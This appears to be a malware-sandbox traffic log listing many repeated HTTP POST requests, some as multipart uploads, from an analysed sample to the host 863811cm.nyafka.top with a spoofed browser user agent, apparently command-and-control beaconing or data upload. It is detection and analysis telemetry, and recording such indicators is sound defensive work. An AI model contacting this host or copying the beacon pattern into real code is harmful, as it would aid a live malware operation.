Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1964Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GRKlSNI6DVRNDSY1D21kPFe0UPhgLxF1jYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MaiWBDBPLNTRdmLSbdcx8tEUy7faLjamVjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MZDXLsvNDmH2j6dJNWIEXsKkXw6XMr0MSCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
